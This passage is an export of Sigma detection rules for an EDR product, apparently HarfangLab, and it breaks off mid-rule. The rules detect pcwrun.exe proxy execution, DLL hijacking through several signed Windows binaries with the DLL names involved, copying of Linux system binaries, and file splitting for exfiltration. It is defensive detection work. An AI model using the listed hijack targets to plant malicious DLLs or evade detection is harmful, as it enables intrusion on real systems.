"content": "title: Proxy Execution via pcwrun.exe\nid: 8317c88b-c80b-4c89-8af0-851a7ba8f0ee\ndescription: |\n Detects a suspicious execution of the Program Compatibility Wizard (pcwrun.exe) to launch a binary.\n Attackers may abuse pcwrun.exe as a LOLBin to bypass security restrictions.\n It is recommended to analyze the process responsible for the execution of pcwrun.exe as well as to look for suspicious actions by child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/02/04\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Pcwrun\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\pcwrun.exe'\n - OriginalFileName: 'pcwrun.exe'\n\n exclusion_explorer:\n ParentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_pca:\n CommandLine:\n - '?:\\Windows\\System32\\pcwrun.exe ?:\\\\* PCA'\n - '?:\\Windows\\System32\\pcwrun.exe \\\\\\\\* PCA'\n ParentImage:\n - '?:\\Windows\\System32\\taskhostw.exe'\n - '?:\\Windows\\System32\\pcaui.exe'\n\n exclusion_taskmgr:\n CommandLine:\n - '?:\\WINDOWS\\system32\\pcwrun.exe ?:\\\\* CompatTab'\n - '?:\\WINDOWS\\system32\\pcwrun.exe \\\\\\\\* CompatTab'\n ParentImage:\n - '?:\\Windows\\System32\\Taskmgr.exe'\n - '?:\\Windows\\System32\\dllhost.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8317c88b-c80b-4c89-8af0-851a7ba8f0ee",
"rule_name": "Proxy Execution via pcwrun.exe",
"rule_description": "Detects a suspicious execution of the Program Compatibility Wizard (pcwrun.exe) to launch a binary.\nAttackers may abuse pcwrun.exe as a LOLBin to bypass security restrictions.\nIt is recommended to analyze the process responsible for the execution of pcwrun.exe as well as to look for suspicious actions by child processes.\n",
"rule_creation_date": "2022-02-04",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8324bb82-ad51-45a4-b7ba-ab3b4f0ef559",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594039Z",
"creation_date": "2026-03-23T11:45:34.594042Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594050Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_relog.yml",
"content": "title: DLL Hijacking via relog.exe\nid: 8324bb82-ad51-45a4-b7ba-ab3b4f0ef559\ndescription: |\n Detects potential Windows DLL Hijacking via relog.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'relog.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\pdh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8324bb82-ad51-45a4-b7ba-ab3b4f0ef559",
"rule_name": "DLL Hijacking via relog.exe",
"rule_description": "Detects potential Windows DLL Hijacking via relog.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "833f7622-fa24-4de8-b6f6-a16318c101c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.293944Z",
"creation_date": "2026-03-23T11:45:35.293971Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.293987Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md",
"https://attack.mitre.org/techniques/T1036/003/"
],
"name": "t1036_003_essential_binary_copy_linux.yml",
"content": "title: Essential Binary Copied\nid: 833f7622-fa24-4de8-b6f6-a16318c101c5\ndescription: |\n Detects the execution of the cp command to copy an essential Linux binary to another location.\n Attackers may rename legitimate system utilities to evade detection mechanisms.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md\n - https://attack.mitre.org/techniques/T1036/003/\ndate: 2022/12/23\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/cp'\n CommandLine|startswith:\n - 'cp /bin/'\n - 'cp /sbin/'\n - 'cp /usr/bin/'\n - 'cp /usr/sbin/'\n - 'cp -? /bin/'\n - 'cp -? /sbin/'\n - 'cp -? /usr/bin/'\n - 'cp -? /usr/sbin/'\n - 'cp -?? /bin/'\n - 'cp -?? /sbin/'\n - 'cp -?? /usr/bin/'\n - 'cp -?? /usr/sbin/'\n ParentImage|contains: '?'\n\n exclusion_rancher:\n - CommandLine: 'cp -l /* /opt/jail/*'\n ParentCommandLine:\n - '/bin/bash /usr/bin/jailer.sh *'\n - 'rancher *'\n - Ancestors|contains|all:\n - '/var/lib/rancher/k3s/'\n - 'containerd-shim-runc'\n\n exclusion_mkinitramfs:\n # cp -pP /bin/kbd_mode /var/tmp/mkinitramfs_2yUr1t//bin/kbd_mode\n # cp -aZ /sbin/modprobe /sbin/rmmod /var/tmp/mkinitramfs_xrTrMR/sbin/\n # cp -pP /usr/bin/plymouth /tmp/tmp.YzmyTjnemx/mkinitramfs_lyrlpn//usr/bin/plymouth\n CommandLine:\n - 'cp -pP /* /var/tmp/mkinitramfs_??????/*'\n - 'cp -a *modprobe *rmmod /var/tmp/mkinitramfs_??????/*'\n - 'cp -aZ */modprobe */rmmod /var/tmp/mkinitramfs_??????/*'\n - 'cp -pP /* /tmp/tmp.??????????/mkinitramfs_??????//usr/*'\n - 'cp -aZ */modprobe */rmmod /tmp/*/mkinitramfs_??????/*'\n\n exclusion_mdadm:\n CommandLine:\n - 'cp -pP /sbin/mdmon /run/initramfs//usr/sbin/mdmon'\n - 'cp -pP /sbin/mdadm /run/initramfs//usr/sbin/mdadm'\n ParentCommandLine:\n - '/bin/sh /usr/share/finalrd/mdadm.finalrd setup'\n - 'run-parts -v --regex=* --arg=setup -- /usr/share/finalrd'\n\n exclusion_iscsi:\n CommandLine: 'cp -pP * /run/initramfs/*'\n ParentCommandLine: '/bin/sh /usr/share/finalrd/open-iscsi.finalrd setup'\n\n exclusion_debootstrap:\n ParentCommandLine|startswith: '/bin/sh /usr/sbin/debootstrap'\n\n exclusion_container:\n - ProcessGrandparentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/var/lib/rancher/rke2/data/*/bin/containerd-shim-runc-v2'\n - '/usr/bin/crio-conmon'\n - Ancestors|contains:\n - '|/usr/bin/dockerd|/usr/lib/systemd/systemd'\n - '|/usr/bin/dockerd|/lib/systemd/systemd'\n - '|/usr/bin/containerd-shim|/usr/bin/containerd|'\n - '|/usr/bin/containerd-shim-runc-v2|/usr/bin/containerd|'\n - '|/usr/bin/lxc-start|'\n\n exclusion_finalrd:\n CommandLine:\n - 'cp -pP /sbin/kexec /run/initramfs//usr/sbin/kexec'\n - 'cp -pP /usr/sbin/mdadm /run/initramfs//usr/sbin/mdadm'\n - 'cp -pP /usr/sbin/mdmon /run/initramfs//usr/sbin/mdmon'\n - 'cp -pP /usr/sbin/kexec /run/initramfs//usr/sbin/kexec'\n Ancestors: '/usr/bin/dash|/usr/bin/run-parts|/usr/bin/dash|/usr/lib/systemd/systemd'\n\n exclusion_apt:\n Ancestors|contains:\n - '|/usr/bin/apt|'\n - '|/usr/bin/apt-get|'\n\n exclusion_initramfs:\n ProcessGrandparentCommandLine|startswith: '/bin/sh /usr/sbin/mkinitramfs -o'\n ProcessParentCommandLine|contains: '/usr/share/initramfs-tools/'\n\n exclusion_aws:\n Ancestors|contains: '|/usr/bin/dash|/var/lib/aws-replication-agent/install_agent|'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "833f7622-fa24-4de8-b6f6-a16318c101c5",
"rule_name": "Essential Binary Copied",
"rule_description": "Detects the execution of the cp command to copy an essential Linux binary to another location.\nAttackers may rename legitimate system utilities to evade detection mechanisms.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "835ab8e3-9576-4a3d-adca-f0b02c4521e9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588301Z",
"creation_date": "2026-03-23T11:45:34.588304Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588312Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nlbmgr.yml",
"content": "title: DLL Hijacking via nlbmgr.exe\nid: 835ab8e3-9576-4a3d-adca-f0b02c4521e9\ndescription: |\n Detects potential Windows DLL Hijacking via nlbmgr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'nlbmgr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\icmp.dll'\n - '\\mfc42u.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "835ab8e3-9576-4a3d-adca-f0b02c4521e9",
"rule_name": "DLL Hijacking via nlbmgr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via nlbmgr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "835cf66a-988d-4be4-a2aa-a2c5d46be227",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098392Z",
"creation_date": "2026-03-23T11:45:34.098394Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098398Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tokenbrokercookies.yml",
"content": "title: DLL Hijacking via TokenBrokerCookies.exe\nid: 835cf66a-988d-4be4-a2aa-a2c5d46be227\ndescription: |\n Detects potential Windows DLL Hijacking via TokenBrokerCookies.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'TokenBrokerCookies.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wininet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "835cf66a-988d-4be4-a2aa-a2c5d46be227",
"rule_name": "DLL Hijacking via TokenBrokerCookies.exe",
"rule_description": "Detects potential Windows DLL Hijacking via TokenBrokerCookies.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8389372f-409b-490b-b28d-b3a408a9728f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093161Z",
"creation_date": "2026-03-23T11:45:34.093163Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093167Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wfs.yml",
"content": "title: DLL Hijacking via wfs.exe\nid: 8389372f-409b-490b-b28d-b3a408a9728f\ndescription: |\n Detects potential Windows DLL Hijacking via wfs.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wfs.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\credui.dll'\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n - '\\UxTheme.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\windowscodecsext.dll'\n - '\\winmm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8389372f-409b-490b-b28d-b3a408a9728f",
"rule_name": "DLL Hijacking via wfs.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wfs.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "83d1aed7-0c4a-4e42-961d-3ecc74862e5d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617555Z",
"creation_date": "2026-03-23T11:45:34.617557Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617561Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1030/"
],
"name": "t1030_split_usage_macos.yml",
"content": "title: File Chunked via Split\nid: 83d1aed7-0c4a-4e42-961d-3ecc74862e5d\ndescription: |\n Detects the execution of the split command.\n Attackers may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds.\n The split command could be used to split a file in multiple pieces to avoid triggering network data transfer threshold alerts.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1030/\ndate: 2022/11/18\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1030\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Collection\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/split'\n condition: selection\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "83d1aed7-0c4a-4e42-961d-3ecc74862e5d",
"rule_name": "File Chunked via Split",
"rule_description": "Detects the execution of the split command.\nAttackers may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds.\nThe split command could be used to split a file in multiple pieces to avoid triggering network data transfer threshold alerts.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2022-11-18",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1030"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84419344-a6ed-4a37-9c60-2f16ddacf2ae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602314Z",
"creation_date": "2026-03-23T11:45:34.602318Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602325Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_optionalfeatures.yml",
"content": "title: DLL Hijacking via optionalfeatures.exe\nid: 84419344-a6ed-4a37-9c60-2f16ddacf2ae\ndescription: |\n Detects potential Windows DLL Hijacking via optionalfeatures.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'optionalfeatures.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DUI70.dll'\n - '\\msi.dll'\n - '\\OLEACC.dll'\n - '\\osbaseln.dll'\n - 